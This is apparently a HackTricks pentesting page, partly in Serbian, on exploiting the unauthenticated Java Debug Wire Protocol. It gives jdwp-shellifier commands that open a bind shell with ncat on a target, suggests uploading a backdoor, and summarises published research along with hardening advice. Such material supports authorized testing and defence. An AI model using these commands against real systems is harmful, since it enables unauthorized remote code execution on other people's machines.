7.5 KiB
Pentesting JDWP - Java Debug Wire Protocol
{% hint style="success" %}
Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
Odmah dostupna postavka za procenu ranjivosti i penetraciono testiranje. Izvršite potpuno pentestiranje sa bilo kog mesta uz 20+ alata i funkcija koje se kreću od rekognosciranja do izveštavanja. Ne zamenjujemo pentestere - razvijamo prilagođene alate, module za detekciju i eksploataciju kako bismo im vratili malo vremena da dublje istraže, otvore shell-ove i zabave se.
{% embed url="https://pentest-tools.com/?utm_term=jul2024&utm_medium=link&utm_source=hacktricks&utm_campaign=spons" %}
Eksploatacija
Eksploatacija JDWP-a se oslanja na nedostatak autentifikacije i enkripcije protokola. Obično se nalazi na portu 8000, ali su mogući i drugi portovi. Početna veza se uspostavlja slanjem "JDWP-Handshake" na ciljni port. Ako je JDWP usluga aktivna, odgovara istim stringom, potvrđujući svoju prisutnost. Ova rukovanja deluju kao metoda otiska prsta za identifikaciju JDWP usluga na mreži.
U smislu identifikacije procesa, pretraga za stringom "jdwk" u Java procesima može ukazivati na aktivnu JDWP sesiju.
Osnovni alat je jdwp-shellifier. Možete ga koristiti sa različitim parametrima:
./jdwp-shellifier.py -t 192.168.2.9 -p 8000 #Obtain internal data
./jdwp-shellifier.py -t 192.168.2.9 -p 8000 --cmd 'ncat -l -p 1337 -e /bin/bash' #Exec something
./jdwp-shellifier.py -t 192.168.2.9 -p 8000 --break-on 'java.lang.String.indexOf' --cmd 'ncat -l -p 1337 -e /bin/bash' #Uses java.lang.String.indexOf as breakpoint instead of java.net.ServerSocket.accept
I found that the use of --break-on 'java.lang.String.indexOf'
make the exploit more stabilan. And if you have the change to upload a backdoor to the host and execute it instead of executing a command, the exploit will be even more stable.
More details
This is a summary of https://ioactive.com/hacking-java-debug-wire-protocol-or-how/. Check it for further details.
- JDWP Overview:
- It's a packet-based network binary protocol, primarily synchronous.
- Lacks authentication and encryption, making it vulnerable when exposed to hostile networks.
- JDWP Handshake:
- A simple handshake process is used to initiate communication. A 14-character ASCII string “JDWP-Handshake” is exchanged between the Debugger (client) and the Debuggee (server).
- JDWP Communication:
- Messages have a simple structure with fields like Length, Id, Flag, and CommandSet.
- CommandSet values range from 0x40 to 0x80, representing different actions and events.
- Exploitation:
- JDWP allows loading and invoking arbitrary classes and bytecode, posing security risks.
- The article details an exploitation process in five steps, involving fetching Java Runtime references, setting breakpoints, and invoking methods.
- Real-Life Exploitation:
- Despite potential firewall protections, JDWP services are discoverable and exploitable in real-world scenarios, as demonstrated by searches on platforms like ShodanHQ and GitHub.
- The exploit script was tested against various JDK versions and is platform-independent, offering reliable Remote Code Execution (RCE).
- Security Implications:
- The presence of open JDWP services on the internet underscores the need for regular security reviews, disabling debug functionalities in production, and proper firewall configurations.
References:
- [https://ioactive.com/hacking-java-debug-wire-protocol-or-how/]
- https://github.com/IOActive/jdwp-shellifier
- http://docs.oracle.com/javase/7/docs/technotes/guides/jpda/architecture.html
- http://www.secdev.org/projects/scapy(no longer active)
- http://www.shodanhq.com/search?q=JDWP-HANDSHAKE
- http://www.hsc-news.com/archives/2013/000109.html (no longer active)
- http://packetstormsecurity.com/files/download/122525/JDWP-exploitation.txt
- https://github.com/search?q=-Xdebug+-Xrunjdwp&type=Code&ref=searchresults
- http://docs.oracle.com/javase/6/docs/api/java/lang/Runtime.html
- http://docs.oracle.com/javase/1.5.0/docs/guide/jpda/jdwp-spec.html
- http://docs.oracle.com/javase/1.5.0/docs/guide/jpda/jdwp/jdwp-protocol.html
- http://nmap.org/nsedoc/scripts/jdwp-exec.html
Instantly available setup for vulnerability assessment & penetration testing. Run a full pentest from anywhere with 20+ tools & features that go from recon to reporting. We don't replace pentesters - we develop custom tools, detection & exploitation modules to give them back some time to dig deeper, pop shells, and have fun.
{% embed url="https://pentest-tools.com/?utm_term=jul2024&utm_medium=link&utm_source=hacktricks&utm_campaign=spons" %}
{% hint style="success" %}
Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.